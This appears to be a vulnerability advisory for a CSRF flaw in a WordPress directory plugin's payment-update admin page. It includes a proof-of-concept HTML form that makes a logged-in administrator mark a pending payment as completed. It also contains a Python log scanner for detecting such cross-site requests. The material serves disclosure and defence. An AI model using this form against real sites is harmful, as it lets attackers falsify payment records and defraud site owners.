The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged-in administrator update arbitrary payment history, for example changing a payment's status from pending to completed.
Add a listing but don't complete the payment (its status will be pending).
<form id="f1" method="POST" action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_payments&wpbdp-view=payment_update">
<table>
<tbody><tr><td>
payment[created_at_date]</td><td><input name="payment[created_at_date]" value="2021-03-31" size="100"></td></tr>
<tr><td>
payment[created_at_time_hour]</td><td><input name="payment[created_at_time_hour]" value="17" size="100"></td></tr>
<tr><td>
payment[created_at_time_min]</td><td><input name="payment[created_at_time_min]" value="49" size="100"></td></tr>
<tr><td>
payment[id]</td><td><input name="payment[id]" value="3" size="100"></td></tr>
<tr><td>
payment[payer_data][address]</td><td><input name="payment[payer_data][address]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][address_2]</td><td><input name="payment[payer_data][address_2]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][city]</td><td><input name="payment[payer_data][city]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][country]</td><td><input name="payment[payer_data][country]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][state]</td><td><input name="payment[payer_data][state]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][zip]</td><td><input name="payment[payer_data][zip]" value="" size="100"></td></tr>
<tr><td>
payment[payer_email]</td><td><input name="payment[payer_email]" value="[email protected]" size="100"></td></tr>
<tr><td>
payment[payer_first_name]</td><td><input name="payment[payer_first_name]" value="" size="100"></td></tr>
<tr><td>
payment[payer_last_name]</td><td><input name="payment[payer_last_name]" value="" size="100"></td></tr>
<tr><td>
payment[status]</td><td><input name="payment[status]" value="completed" size="100"></td></tr>
<tr><td>
payment_note</td><td><input name="payment_note" value="" size="100"></td></tr>
</tbody></table>
<input id="submit" type="submit" value="Submit">
</form>
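
A log check for the request the form above generates, added here as an example (it is not part of the original advisory or the plugin's code): it scans web access logs for POSTs to the `payment_update` view whose Referer is missing or points to another site. The Combined Log Format, the `SITE_HOST` value and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "example.com"  # assumption: hostname of the WordPress site being monitored

# Combined Log Format: ip - user [time] "METHOD target HTTP/x" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def is_payment_update(target):
    """True when the request targets the payment_update admin view shown in the form."""
    url = urlsplit(target)
    q = parse_qs(url.query)
    return (url.path.endswith("/wp-admin/admin.php")
            and q.get("page") == ["wpbdp_admin_payments"]
            and q.get("wpbdp-view") == ["payment_update"])

def classify(line):
    """Return None for unrelated lines, else (verdict, ip, time, referer)."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST" or not is_payment_update(m["target"]):
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        verdict = "no-referer"    # can be stripped by Referrer-Policy; review manually
    elif urlsplit(referer).hostname == SITE_HOST:
        verdict = "same-origin"   # expected when an admin submits the real admin form
    else:
        verdict = "cross-origin"  # the form was submitted from a page on another site
    return verdict, m["ip"], m["time"], referer

def scan(lines):
    """Collect every payment_update POST that did not originate from the site itself."""
    hits = [classify(line) for line in lines]
    return [h for h in hits if h and h[0] != "same-origin"]

# Constructed sample log lines (not real traffic).
SAMPLE = [
    '203.0.113.7 - - [31/Mar/2021:17:50:02 +0000] "POST /wp-admin/admin.php?page=wpbdp_admin_payments&wpbdp-view=payment_update HTTP/1.1" 302 0 "https://example.com/wp-admin/admin.php?page=wpbdp_admin_payments" "Mozilla/5.0"',
    '198.51.100.23 - - [31/Mar/2021:18:02:11 +0000] "POST /wp-admin/admin.php?page=wpbdp_admin_payments&wpbdp-view=payment_update HTTP/1.1" 302 0 "https://other-site.example/promo.html" "Mozilla/5.0"',
    '198.51.100.23 - - [31/Mar/2021:18:05:40 +0000] "POST /wp-admin/admin.php?page=wpbdp_admin_payments&wpbdp-view=payment_update HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [31/Mar/2021:18:06:01 +0000] "GET /wp-admin/admin.php?page=wpbdp_admin_payments&wpbdp-view=payment_update HTTP/1.1" 200 512 "https://other-site.example/promo.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```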